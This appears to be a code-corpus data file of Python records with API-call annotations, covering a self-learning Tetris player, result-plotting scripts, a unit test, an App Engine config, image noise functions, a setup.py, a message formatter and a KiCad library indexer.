    move_rect.topleft = (WINDOWWIDTH - 230, 300)
    GAME.blit(move_surf, move_rect)
    # draw the learning-progress text
    move_surf = SubFont.render('Learning level : %s' % games_completed, True, TEXTCOLOR)
    move_rect = move_surf.get_rect()
    move_rect.topleft = (20, 150)
    GAME.blit(move_surf, move_rect)


def draw_piece(piece, pixelx=None, pixely=None):
    shape_to_draw = PIECES[piece['shape']][piece['rotation']]
    if pixelx is None and pixely is None:
        # convert the piece's board x, y to the pixel x, y to render at
        pixelx, pixely = convert_to_pixel_coords(piece['x'], piece['y'])
    for x in range(BOXWIDTH):
        for y in range(BOXHEIGHT):
            if shape_to_draw[y][x] != BLANK:
                draw_box(None, None, piece['color'], pixelx + (x * BOXSIZE), pixely + (y * BOXSIZE))


def draw_next_piece(piece):  # render the shape of the next piece
    # draw the "next" text
    next_surf = SubFont.render('Next:', True, TEXTCOLOR)
    next_rect = next_surf.get_rect()
    next_rect.topleft = (WINDOWWIDTH - 200, 80)
    GAME.blit(next_surf, next_rect)
    # draw the "next" piece
    draw_piece(piece, pixelx=WINDOWWIDTH - 180, pixely=100)
def get_parameters(board):
    # This function will calculate different parameters of the current board
    # Initialize some stuff
    heights = [0] * BOARDWIDTH
    diffs = [0] * (BOARDWIDTH - 1)
    holes = 0
    diff_sum = 0

    # Calculate the maximum height of each column
    for i in range(0, BOARDWIDTH):  # Select a column
        for j in range(0, BOARDHEIGHT):  # Search down starting from the top of the board
            if int(board[i][j]) > 0:  # Is the cell occupied?
                heights[i] = BOARDHEIGHT - j  # Store the height value
                break

    # Calculate the difference in heights
    for i in range(0, len(diffs)):
        diffs[i] = heights[i + 1] - heights[i]

    # Calculate the maximum height
    max_height = max(heights)

    # Count the number of holes
    for i in range(0, BOARDWIDTH):
        occupied = 0  # Set the 'Occupied' flag to 0 for each new column
        for j in range(0, BOARDHEIGHT):  # Scan from top to bottom
            if int(board[i][j]) > 0:
                occupied = 1  # If a block is found, set the 'Occupied' flag to 1
            if int(board[i][j]) == 0 and occupied == 1:
                holes += 1  # If a hole is found, add one to the count

    height_sum = sum(heights)
    for i in diffs:
        diff_sum += abs(i)
    return height_sum, diff_sum, max_height, holes


def get_expected_score(test_board, weights):
    # This function calculates the score of a given board state, given weights
    # and the number of lines previously cleared.
    height_sum, diff_sum, max_height, holes = get_parameters(test_board)
    A = weights[0]
    B = weights[1]
    C = weights[2]
    D = weights[3]
    test_score = float(A * height_sum + B * diff_sum + C * max_height + D * holes)
    return test_score
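# Quick sanity check (illustrative, not part of the original module): every
# feature of an empty board is zero, so any weight vector scores it 0.0:
#   get_expected_score(get_blank_board(), [-1, -1, -1, -30])  # -> 0.0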
def simulate_board(test_board, test_piece, move):
    # This function simulates placing the current falling piece onto the
    # board, specified by 'move,' an array with two elements, 'rot' and 'sideways'.
    # 'rot' gives the number of times the piece is to be rotated, ranging in [0:3]
    # 'sideways' gives the horizontal movement from the piece's current position, in [-9:9]
    # It removes complete lines and returns the next board state as well as the number
    # of lines cleared.
    rot = move[0]
    sideways = move[1]
    test_lines_removed = 0
    reference_height = get_parameters(test_board)[0]
    if test_piece is None:
        return None

    # Rotate test_piece to match the desired move
    for i in range(0, rot):
        test_piece['rotation'] = (test_piece['rotation'] + 1) % len(PIECES[test_piece['shape']])

    # Test for move validity!
    if not is_valid_position(test_board, test_piece, adj_x=sideways, adj_y=0):
        # The move itself is not valid!
        return None

    # Move the test_piece to collide on the board
    test_piece['x'] += sideways
    for i in range(0, BOARDHEIGHT):
        if is_valid_position(test_board, test_piece, adj_x=0, adj_y=1):
            test_piece['y'] = i

    # Place the piece on the virtual board
    if is_valid_position(test_board, test_piece, adj_x=0, adj_y=0):
        add_to_board(test_board, test_piece)
        test_lines_removed, test_board = remove_complete_lines(test_board)
    height_sum, diff_sum, max_height, holes = get_parameters(test_board)
    one_step_reward = 5 * (test_lines_removed * test_lines_removed) - (height_sum - reference_height)
    return test_board, one_step_reward


def find_best_move(board, piece, weights, explore_change):
    move_list = []
    score_list = []
    for rot in range(0, len(PIECES[piece['shape']])):
        for sideways in range(-5, 6):
            move = [rot, sideways]
            test_board = copy.deepcopy(board)
            test_piece = copy.deepcopy(piece)
            test_board = simulate_board(test_board, test_piece, move)
            if test_board is not None:
                move_list.append(move)
                test_score = get_expected_score(test_board[0], weights)
                score_list.append(test_score)
    best_score = max(score_list)
    best_move = move_list[score_list.index(best_score)]

    if random.random() < explore_change:
        move = move_list[random.randint(0, len(move_list) - 1)]
    else:
        move = best_move
    return move
def make_move(move):
    # This function will make the indicated move, with the first digit
    # representing the number of rotations to be made and the second
    # representing the column to place the piece in.
    rot = move[0]
    sideways = move[1]
    if rot != 0:
        pyautogui.press('up')
        rot -= 1
    else:
        if sideways == 0:
            pyautogui.press('space')
        if sideways < 0:
            pyautogui.press('left')
            sideways += 1
        if sideways > 0:
            pyautogui.press('right')
            sideways -= 1
    return [rot, sideways]
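# Note (added for clarity, not in the original): make_move performs at most one
# key press per call and returns the remaining [rot, sideways]; Run_game feeds
# the result back in on the next frame, so a move is executed step by step.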
def gradient_descent(board, piece, weights, explore_change):
    move = find_best_move(board, piece, weights, explore_change)
    old_params = get_parameters(board)
    test_board = copy.deepcopy(board)
    test_piece = copy.deepcopy(piece)
    test_board = simulate_board(test_board, test_piece, move)
    if test_board is not None:
        new_params = get_parameters(test_board[0])
        one_step_reward = test_board[1]
    for i in range(0, len(weights)):
        weights[i] = weights[i] + alpha * weights[i] * (
            one_step_reward - old_params[i] + gamma * new_params[i])
    regularization_term = abs(sum(weights))
    for i in range(0, len(weights)):
        weights[i] = 100 * weights[i] / regularization_term
        weights[i] = math.floor(1e4 * weights[i]) / 1e4  # Rounds the weights
    return move, weights
def Run(g, f, s):
    global GAME, FPS, SubFont
    global weights, explore_change, games_completed
    GAME = g
    FPS = f
    SubFont = s
    games_completed = 0
    while True:  # game loop
        games_completed += 1
        newScore, weights, explore_change = Run_game(weights, explore_change)
        print("Game Number ", games_completed, " achieved a score of: ", newScore)
        if games_completed == MAX_GAMES:  # stop after MAX_GAMES (20) games in total
            show_text_screen('Game Finish')
            time.sleep(3)
            return
        else:
            show_text_screen('Game Over')  # otherwise keep playing
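# --- Illustrative bootstrap (not part of the original file) ---
# Run() expects a pygame surface, a clock, and a font from the caller; the
# original entry script is not shown, so this is a guessed minimal setup:
#
#   pg.init()
#   screen = pg.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
#   clock = pg.time.Clock()
#   font = pg.font.Font(None, 24)
#   Run(screen, clock, font)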
|
[
"copy.deepcopy",
"pygame.draw.line",
"pygame.draw.rect",
"pygame.event.get",
"pyautogui.press",
"math.floor",
"time.sleep",
"time.time",
"random.random",
"pygame.display.update",
"sys.exit"
] |
[((3036, 3047), 'time.time', 'time.time', ([], {}), '()\n', (3045, 3047), False, 'import random, time, sys\n'), ((7084, 7103), 'pygame.display.update', 'pg.display.update', ([], {}), '()\n', (7101, 7103), True, 'import pygame as pg\n'), ((7123, 7138), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (7133, 7138), False, 'import random, time, sys\n'), ((10756, 10846), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'COLORS[color]', '(pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1)'], {}), '(GAME, COLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 1, \n BOXSIZE - 1))\n', (10768, 10846), True, 'import pygame as pg\n'), ((10867, 10961), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'LIGHTCOLORS[color]', '(pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4)'], {}), '(GAME, LIGHTCOLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 4,\n BOXSIZE - 4))\n', (10879, 10961), True, 'import pygame as pg\n'), ((11037, 11156), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'BORDERCOLOR', '(XMARGIN - 3, YMARGIN - 7, BOARDWIDTH * BOXSIZE + 8, BOARDHEIGHT * BOXSIZE + 8)', '(5)'], {}), '(GAME, BORDERCOLOR, (XMARGIN - 3, YMARGIN - 7, BOARDWIDTH *\n BOXSIZE + 8, BOARDHEIGHT * BOXSIZE + 8), 5)\n', (11049, 11156), True, 'import pygame as pg\n'), ((11243, 11340), 'pygame.draw.rect', 'pg.draw.rect', (['GAME', 'BGCOLOR', '(XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT)'], {}), '(GAME, BGCOLOR, (XMARGIN, YMARGIN, BOXSIZE * BOARDWIDTH, \n BOXSIZE * BOARDHEIGHT))\n', (11255, 11340), True, 'import pygame as pg\n'), ((18416, 18436), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (18429, 18436), False, 'import copy, numpy, pyautogui, math\n'), ((18454, 18474), 'copy.deepcopy', 'copy.deepcopy', (['piece'], {}), '(piece)\n', (18467, 18474), False, 'import copy, numpy, pyautogui, math\n'), ((3901, 3915), 'pygame.event.get', 'pg.event.get', ([], {}), '()\n', (3913, 3915), True, 'import pygame as pg\n'), ((6197, 6216), 'pygame.display.update', 'pg.display.update', ([], {}), '()\n', (6214, 6216), True, 'import pygame as pg\n'), ((10235, 10368), 'pygame.draw.line', 'pg.draw.line', (['GAME', 'GRAY', '(XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN - 3)', '(XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN + 600)', '(2)'], {}), '(GAME, GRAY, (XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN - 3),\n (XMARGIN + 10 + (i * BOXSIZE - 10), YMARGIN + 600), 2)\n', (10247, 10368), True, 'import pygame as pg\n'), ((10451, 10565), 'pygame.draw.line', 'pg.draw.line', (['GAME', 'GRAY', '(XMARGIN, YMARGIN - 3 + j * BOXSIZE)', '(XMARGIN + 300, YMARGIN - 3 + j * BOXSIZE)', '(2)'], {}), '(GAME, GRAY, (XMARGIN, YMARGIN - 3 + j * BOXSIZE), (XMARGIN + \n 300, YMARGIN - 3 + j * BOXSIZE), 2)\n', (10463, 10565), True, 'import pygame as pg\n'), ((17485, 17500), 'random.random', 'random.random', ([], {}), '()\n', (17498, 17500), False, 'import random, time, sys\n'), ((17917, 17938), 'pyautogui.press', 'pyautogui.press', (['"""up"""'], {}), "('up')\n", (17932, 17938), False, 'import copy, numpy, pyautogui, math\n'), ((3262, 3273), 'time.time', 'time.time', ([], {}), '()\n', (3271, 3273), False, 'import random, time, sys\n'), ((17055, 17075), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (17068, 17075), False, 'import copy, numpy, pyautogui, math\n'), ((17101, 17121), 'copy.deepcopy', 'copy.deepcopy', (['piece'], {}), '(piece)\n', (17114, 17121), False, 'import copy, numpy, pyautogui, math\n'), ((18004, 18028), 'pyautogui.press', 'pyautogui.press', (['"""space"""'], {}), "('space')\n", (18019, 18028), False, 'import copy, numpy, pyautogui, math\n'), ((18066, 18089), 'pyautogui.press', 'pyautogui.press', (['"""left"""'], {}), "('left')\n", (18081, 18089), False, 'import copy, numpy, pyautogui, math\n'), ((18153, 18177), 'pyautogui.press', 'pyautogui.press', (['"""right"""'], {}), "('right')\n", (18168, 18177), False, 'import copy, numpy, pyautogui, math\n'), ((18984, 19016), 'math.floor', 'math.floor', (['(10000.0 * weights[i])'], {}), '(10000.0 * weights[i])\n', (18994, 19016), False, 'import copy, numpy, pyautogui, math\n'), ((19572, 19585), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (19582, 19585), False, 'import random, time, sys\n'), ((4024, 4034), 'sys.exit', 'sys.exit', ([], {}), '()\n', (4032, 4034), False, 'import random, time, sys\n'), ((5352, 5363), 'time.time', 'time.time', ([], {}), '()\n', (5361, 5363), False, 'import random, time, sys\n'), ((5947, 5958), 'time.time', 'time.time', ([], {}), '()\n', (5956, 5958), False, 'import random, time, sys\n')]
|
"""
main entry of post process results data and plot
"""
import PlotHeatMap
import PostProcessDataFuns as psf
import PlotOperatorConverge
import para
import PlotGantt
# root_folder = r"C:\Users\phdji\OneDrive - Danmarks Tekniske Universitet\JuanJuanLin\Tests2022/"
# root_folder = r'C:/GitCodes/Res/'
# root_folder = r'C:/GitCodes/LearnByCompare/'
# root_folder = r'C:/GitCodes/RandomDemand/'
# root_folder = r'M:/LinJuan/500Iter/'
# plot 1 plot the heatmap for the optimal pattern
plot_opt_case_folder = r"M:/LinJuan/0.001ConvergeNoLearning/Operator/1_TestOp_8/"
def EffectOfOperators():
# convergence the algorithm
## each operator
OperatorFolder = root_folder + "/Operator/"
psf.effect_of_operators(OperatorFolder)
def CompareThree():
"""
compare three cases
1: Single operator 2. Uni. 2 adaptive
"""
OperatorFolder = root_folder + "/CompareThree/"
psf.CompareOneFolder(OperatorFolder,"CompareThree")
def PlotFinalRelation(test_folder:str):
"""visulise the dominate relationship
"""
# test_folder = "M:/LinJuan/0_ALNS/"
# test_folder = "C:/GitCodes/0_ALNS/"
bs = psf.getBestSeed(test_folder)
print("Best Seed = {0}".format(bs))
psf.plotRelation(test_folder)
if __name__ == "__main__":
# EffectOfOperators()
# CompareThree()
# test_folder = r'C:/GitCodes/1_TestOp_8/'
# PlotFinalRelation(test_folder)
# testfolder = root_folder + "/RemoveOperator/"
# psf.CompareOneFolder(testfolder,"RemoveOp")
# remark: I may need to adjust the heatmap to the dominate score map??
# op_folder = r"M:\LinJuan\0.001ConvergeNoLearning\Operator\1_TestOp_8"
# PlotHeatMap.plot_Patten_heat_map(para.FailureLinks,num_of_seed=para.NumOfTestSeed,_folder=op_folder)
# PlotOperatorConverge.change_operator_prob_over_iterations(op_folder,_num_operators=9)
# plot gantt chart
best_seed = psf.getBestSeed(plot_opt_case_folder)
# psf.print_best_seed_sol(plot_opt_case_folder,best_seed)
# psf.print_best_seed_period(plot_opt_case_folder,best_seed)
psf.plot_best_seed_period(plot_opt_case_folder)
PlotGantt.plot_general_Gant_chart("Gantt_SiouxFall",plot_opt_case_folder,best_seed)
pass
exit()
## unified prob
### Just copy the plot from unfolder
## adaptive probability
### Just copy the plot from ALNS folder
## change of the prob rate over all iterations
OperatorCovergeFolder = root_folder +"/9_ALNS/"
PlotOperatorConverge.change_operator_prob_over_iterations(root_folder)
# remark: need to set the nodes read
PlotHeatMap.plot_Patten_heat_map(set_fail_links=[])
# project schedule
## TODO: plot the gant chart for the general case
# compare with the gentic algorithm
|
[
"PlotHeatMap.plot_Patten_heat_map",
"PostProcessDataFuns.CompareOneFolder",
"PostProcessDataFuns.plotRelation",
"PostProcessDataFuns.getBestSeed",
"PlotOperatorConverge.change_operator_prob_over_iterations",
"PlotGantt.plot_general_Gant_chart",
"PostProcessDataFuns.effect_of_operators",
"PostProcessDataFuns.plot_best_seed_period"
] |
[((2453, 2523), 'PlotOperatorConverge.change_operator_prob_over_iterations', 'PlotOperatorConverge.change_operator_prob_over_iterations', (['root_folder'], {}), '(root_folder)\n', (2510, 2523), False, 'import PlotOperatorConverge\n'), ((2561, 2612), 'PlotHeatMap.plot_Patten_heat_map', 'PlotHeatMap.plot_Patten_heat_map', ([], {'set_fail_links': '[]'}), '(set_fail_links=[])\n', (2593, 2612), False, 'import PlotHeatMap\n'), ((705, 744), 'PostProcessDataFuns.effect_of_operators', 'psf.effect_of_operators', (['OperatorFolder'], {}), '(OperatorFolder)\n', (728, 744), True, 'import PostProcessDataFuns as psf\n'), ((915, 967), 'PostProcessDataFuns.CompareOneFolder', 'psf.CompareOneFolder', (['OperatorFolder', '"""CompareThree"""'], {}), "(OperatorFolder, 'CompareThree')\n", (935, 967), True, 'import PostProcessDataFuns as psf\n'), ((1151, 1179), 'PostProcessDataFuns.getBestSeed', 'psf.getBestSeed', (['test_folder'], {}), '(test_folder)\n', (1166, 1179), True, 'import PostProcessDataFuns as psf\n'), ((1224, 1253), 'PostProcessDataFuns.plotRelation', 'psf.plotRelation', (['test_folder'], {}), '(test_folder)\n', (1240, 1253), True, 'import PostProcessDataFuns as psf\n'), ((1914, 1951), 'PostProcessDataFuns.getBestSeed', 'psf.getBestSeed', (['plot_opt_case_folder'], {}), '(plot_opt_case_folder)\n', (1929, 1951), True, 'import PostProcessDataFuns as psf\n'), ((2083, 2130), 'PostProcessDataFuns.plot_best_seed_period', 'psf.plot_best_seed_period', (['plot_opt_case_folder'], {}), '(plot_opt_case_folder)\n', (2108, 2130), True, 'import PostProcessDataFuns as psf\n'), ((2135, 2224), 'PlotGantt.plot_general_Gant_chart', 'PlotGantt.plot_general_Gant_chart', (['"""Gantt_SiouxFall"""', 'plot_opt_case_folder', 'best_seed'], {}), "('Gantt_SiouxFall', plot_opt_case_folder,\n best_seed)\n", (2168, 2224), False, 'import PlotGantt\n')]
|
"""
TDD - Test Driven Development
"""
import unittest
from src.base.bacon_with_eggs import bacon_with_eggs
class TestBaconWithEggs(unittest.TestCase):
def test_bacon_with_eggs_assertion_error_do_not_receive_int(self):
with self.assertRaises(AssertionError):
bacon_with_eggs('')
def test_bacon_with_eggs_return_bacon_with_eggs_if_the_input_is_a_multiple_of_3_and_5(self):
inputs = (15, 30, 90, 120)
output = "Bacon with Eggs"
for input in inputs:
with self.subTest(input=input, output=output):
self.assertEqual(
bacon_with_eggs(input),
output,
msg=f"'{input}' id not return the '{output}'"
)
if __name__ == '__main__':
unittest.main(verbosity=2)
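# --- Illustrative sketch (not the real src.base module, which isn't shown) ---
# A minimal implementation consistent with these tests: reject non-int input
# with an AssertionError and return "Bacon with Eggs" for multiples of both
# 3 and 5. What it returns for other ints is not pinned down by the tests,
# so the empty-string fallback here is an assumption.
#
#   def bacon_with_eggs(number):
#       assert isinstance(number, int), 'number must be an int'
#       if number % 3 == 0 and number % 5 == 0:
#           return 'Bacon with Eggs'
#       return ''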
|
[
"unittest.main",
"src.base.bacon_with_eggs.bacon_with_eggs"
] |
[((786, 812), 'unittest.main', 'unittest.main', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (799, 812), False, 'import unittest\n'), ((286, 305), 'src.base.bacon_with_eggs.bacon_with_eggs', 'bacon_with_eggs', (['""""""'], {}), "('')\n", (301, 305), False, 'from src.base.bacon_with_eggs import bacon_with_eggs\n'), ((617, 639), 'src.base.bacon_with_eggs.bacon_with_eggs', 'bacon_with_eggs', (['input'], {}), '(input)\n', (632, 639), False, 'from src.base.bacon_with_eggs import bacon_with_eggs\n')]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
`appengine_config.py` is automatically loaded when Google App Engine
starts a new instance of your application. This runs before any
WSGI applications specified in app.yaml are loaded.
"""
from google.appengine.ext import vendor
# Third-party libraries are stored in "lib", vendoring will make
# sure that they are importable by the application.
vendor.add('lib')
# disable warnings when using requests library with sockets on app engine
import requests
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
from requests.packages.urllib3.exceptions import SNIMissingWarning
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)
|
[
"google.appengine.ext.vendor.add",
"requests.packages.urllib3.disable_warnings"
] |
[((416, 433), 'google.appengine.ext.vendor.add', 'vendor.add', (['"""lib"""'], {}), "('lib')\n", (426, 433), False, 'from google.appengine.ext import vendor\n'), ((666, 733), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', (['InsecurePlatformWarning'], {}), '(InsecurePlatformWarning)\n', (708, 733), False, 'import requests\n'), ((734, 795), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', (['SNIMissingWarning'], {}), '(SNIMissingWarning)\n', (776, 795), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct  6 23:59:38 2021

@author: <NAME>
"""
# Adding Gaussian and salt-and-pepper noise to an image
import cv2 as cv
import numpy as np
import random


def gaussian_noise(image):
    # Take the dimensions from the image itself rather than hard-coding 512x512
    row, col = image.shape
    mean = 0
    var = 0.1
    sigma = var ** 0.5
    gauss = np.random.normal(mean, sigma, (row, col))
    gauss = gauss.reshape(row, col)
    gauss_noisy = image + gauss
    return gauss_noisy


def salt_and_pepper_noise(image):
    # Getting the dimensions of the image (use the parameter, not the global)
    row, col = image.shape
    # Randomly pick some pixels in the
    # image for coloring them white
    # Pick a random number between 300 and 10000
    number_of_pixels = random.randint(300, 10000)
    for i in range(number_of_pixels):
        # Pick a random y coordinate
        y_coord = random.randint(0, row - 1)
        # Pick a random x coordinate
        x_coord = random.randint(0, col - 1)
        # Color that pixel to white
        image[y_coord][x_coord] = 255
    # Randomly pick some pixels in
    # the image for coloring them black
    # Pick a random number between 300 and 10000
    number_of_pixels = random.randint(300, 10000)
    for i in range(number_of_pixels):
        # Pick a random y coordinate
        y_coord = random.randint(0, row - 1)
        # Pick a random x coordinate
        x_coord = random.randint(0, col - 1)
        # Color that pixel to black
        image[y_coord][x_coord] = 0
    return image


img = cv.imread('Lenna.jpg', 0)
gn = gaussian_noise(img)
snp = salt_and_pepper_noise(img)
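# --- Illustrative follow-up (not part of the original) ---
# Persisting the results; gauss_noisy is a float array, so clip and cast
# before writing:
#
#   cv.imwrite('lenna_gaussian.jpg', np.clip(gn, 0, 255).astype(np.uint8))
#   cv.imwrite('lenna_salt_pepper.jpg', snp)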
|
[
"cv2.imread",
"random.randint",
"numpy.random.normal"
] |
[((1586, 1611), 'cv2.imread', 'cv.imread', (['"""Lenna.jpg"""', '(0)'], {}), "('Lenna.jpg', 0)\n", (1595, 1611), True, 'import cv2 as cv\n'), ((338, 379), 'numpy.random.normal', 'np.random.normal', (['mean', 'sigma', '(row, col)'], {}), '(mean, sigma, (row, col))\n', (354, 379), True, 'import numpy as np\n'), ((733, 759), 'random.randint', 'random.randint', (['(300)', '(10000)'], {}), '(300, 10000)\n', (747, 759), False, 'import random\n'), ((1219, 1245), 'random.randint', 'random.randint', (['(300)', '(10000)'], {}), '(300, 10000)\n', (1233, 1245), False, 'import random\n'), ((860, 886), 'random.randint', 'random.randint', (['(0)', '(row - 1)'], {}), '(0, row - 1)\n', (874, 886), False, 'import random\n'), ((951, 977), 'random.randint', 'random.randint', (['(0)', '(col - 1)'], {}), '(0, col - 1)\n', (965, 977), False, 'import random\n'), ((1347, 1373), 'random.randint', 'random.randint', (['(0)', '(row - 1)'], {}), '(0, row - 1)\n', (1361, 1373), False, 'import random\n'), ((1438, 1464), 'random.randint', 'random.randint', (['(0)', '(col - 1)'], {}), '(0, col - 1)\n', (1452, 1464), False, 'import random\n')]
|
from setuptools import setup, find_packages

setup(
    name="betterplotlib",
    version="1.5.0",
    description="Some wrappers for matplotlib to make plotting easier and nicer.",
    long_description="This module contains wrapper functions for matplotlib. A lot of the matplotlib plots are ugly and not easy to make, so I wrote some functions that do a lot of the stuff that should be easy, as well as wrappers for common plots that make them look nicer.",
    url="http://betterplotlib.readthedocs.io/en/master/",
    author="<NAME>",
    author_email="<EMAIL>",
    license="MIT",
    keywords="plotting matplotlib",
    packages=find_packages(exclude=["docs"]),
    install_requires=["matplotlib", "numpy", "palettable"]
)
|
[
"setuptools.find_packages"
] |
[((613, 644), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['docs']"}), "(exclude=['docs'])\n", (626, 644), False, 'from setuptools import setup, find_packages\n')]
|
# -*- coding: utf-8 -*-
############################################################################
#
# Copyright ยฉ 2012, 2013, 2014, 2015 OnlineGroups.net and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
############################################################################
from __future__ import absolute_import, unicode_literals, print_function
from operator import attrgetter
from gs.cache import cache
from gs.group.privacy import get_visibility, PERM_ANN
from gs.group.messages.text import (
    split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher,
    wrap_message)
from Products.GSGroup.interfaces import IGSMailingListInfo
from .matcher import (youTubeMatcher, vimeoMatcher, PublicEmailMatcher, )

# this is currently the hard limit on the number of words we will process.
# after this we insert a message. TODO: make this more flexible by using
# AJAX to incrementally fetch large emails
EMAIL_WORD_LIMIT = 5000


class OnlineHTMLBody(HTMLBody):
    '''The HTML form of a plain-text email body.

:param str originalText: The original (plain) text
:param object contentProvider: The content provider that is rendering this message'''

    def __init__(self, originalText, perm, okAddresses):
        super(OnlineHTMLBody, self).__init__(originalText)
        self.matchers = [youTubeMatcher, vimeoMatcher, boldMatcher, wwwMatcher, uriMatcher]
        if perm == PERM_ANN:  # The messages are visible to Anon
            p = PublicEmailMatcher(okAddresses)
            self.matchers.append(p)
        else:
            self.matchers.append(emailMatcher)
        # sort in place; a bare sorted() call would discard its result
        self.matchers.sort(key=attrgetter('weight'))


@cache('gs.group.messages.post.postintroremainder',
       lambda contentProvider, text: ':'.join(
           (str(contentProvider.post['post_id']),
            str(get_visibility(contentProvider.groupInfo.groupObj)))),
       3600)
def get_post_intro_and_remainder(contentProvider, text):
    """Get the introduction and remainder text of the formatted post

:param object contentProvider: The content provider rendering the message, providing access to
    the context, groupInfo and other useful tidbits.
:param str text: The text to split into an introduction and remainder
:returns: A 2-tuple of the strings that represent the email intro and the remainder."""
    if not contentProvider.groupInfo.groupObj:
        raise ValueError("The groupInfo object should always have a groupObj")
    if not text:
        # Sorry, Dijkstra
        return SplitMessage('', '')

    mailBody = wrap_message(text)
    plain = split_message(mailBody)
    messages = contentProvider.groupInfo.groupObj.messages
    perm = get_visibility(messages)
    ml = IGSMailingListInfo(contentProvider.groupInfo.groupObj)
    okAddresses = (contentProvider.siteInfo.get_support_email(),
                   ml.get_property('mailto'))
    markedUpIntro = ''
    if plain.intro:
        markedUpIntro = unicode(OnlineHTMLBody(plain.intro, perm, okAddresses))
    markedUpRemainder = ''
    if plain.remainder:
        markedUpRemainder = unicode(OnlineHTMLBody(plain.remainder, perm, okAddresses))
    retval = SplitMessage(markedUpIntro, markedUpRemainder)
    return retval
|
[
"Products.GSGroup.interfaces.IGSMailingListInfo",
"operator.attrgetter",
"gs.group.messages.text.split_message",
"gs.group.privacy.get_visibility",
"gs.group.messages.text.SplitMessage",
"gs.group.messages.text.wrap_message"
] |
[((2972, 2990), 'gs.group.messages.text.wrap_message', 'wrap_message', (['text'], {}), '(text)\n', (2984, 2990), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((3003, 3026), 'gs.group.messages.text.split_message', 'split_message', (['mailBody'], {}), '(mailBody)\n', (3016, 3026), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((3098, 3122), 'gs.group.privacy.get_visibility', 'get_visibility', (['messages'], {}), '(messages)\n', (3112, 3122), False, 'from gs.group.privacy import get_visibility, PERM_ANN\n'), ((3133, 3187), 'Products.GSGroup.interfaces.IGSMailingListInfo', 'IGSMailingListInfo', (['contentProvider.groupInfo.groupObj'], {}), '(contentProvider.groupInfo.groupObj)\n', (3151, 3187), False, 'from Products.GSGroup.interfaces import IGSMailingListInfo\n'), ((3577, 3623), 'gs.group.messages.text.SplitMessage', 'SplitMessage', (['markedUpIntro', 'markedUpRemainder'], {}), '(markedUpIntro, markedUpRemainder)\n', (3589, 3623), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((2936, 2956), 'gs.group.messages.text.SplitMessage', 'SplitMessage', (['""""""', '""""""'], {}), "('', '')\n", (2948, 2956), False, 'from gs.group.messages.text import split_message, SplitMessage, HTMLBody, boldMatcher, emailMatcher, wwwMatcher, uriMatcher, wrap_message\n'), ((2030, 2050), 'operator.attrgetter', 'attrgetter', (['"""weight"""'], {}), "('weight')\n", (2040, 2050), False, 'from operator import attrgetter\n'), ((2220, 2270), 'gs.group.privacy.get_visibility', 'get_visibility', (['contentProvider.groupInfo.groupObj'], {}), '(contentProvider.groupInfo.groupObj)\n', (2234, 2270), False, 'from gs.group.privacy import get_visibility, PERM_ANN\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import os.path
from whoosh import index
from whoosh.fields import Schema, ID, TEXT, NUMERIC
from whoosh.analysis import StemmingAnalyzer
from .kicadsearch_parser import LibDocCreator, ModDocCreator, KicadModDocCreator
def list_files(rootdirs, sufix):
for rootdir in rootdirs:
for root, dirs, files in os.walk(rootdir):
for path in [root + os.path.sep + file for file in files
if file.lower().endswith(sufix)]:
print(path)
yield path
class KicadIndexer(object):
def __init__(self):
pass
def create_index(self, indexdir, librarydirs, moduledirs, encoding):
if not os.path.exists(indexdir):
os.mkdir(indexdir)
schema = Schema(id=ID(stored=True),
type=TEXT(stored=True),
name=TEXT(stored=True),
descr=TEXT(stored=True, analyzer=StemmingAnalyzer()),
keyword=TEXT(stored=True, analyzer=StemmingAnalyzer()),
reference=TEXT(stored=True),
md5sum=TEXT(stored=True),
path=TEXT(stored=True),
position=NUMERIC(stored=True),
lineno=NUMERIC(stored=True),
lines=NUMERIC(stored=True),
path2=TEXT(stored=True),
position2=NUMERIC(stored=True),
lineno2=NUMERIC(stored=True),
lines2=NUMERIC(stored=True), )
ix = index.create_in(indexdir, schema)
writer = ix.writer()
for path in list_files(librarydirs, '.lib'):
for doc in LibDocCreator(path, encoding).create():
writer.add_document(**doc)
for path in list_files(moduledirs, '.mod'):
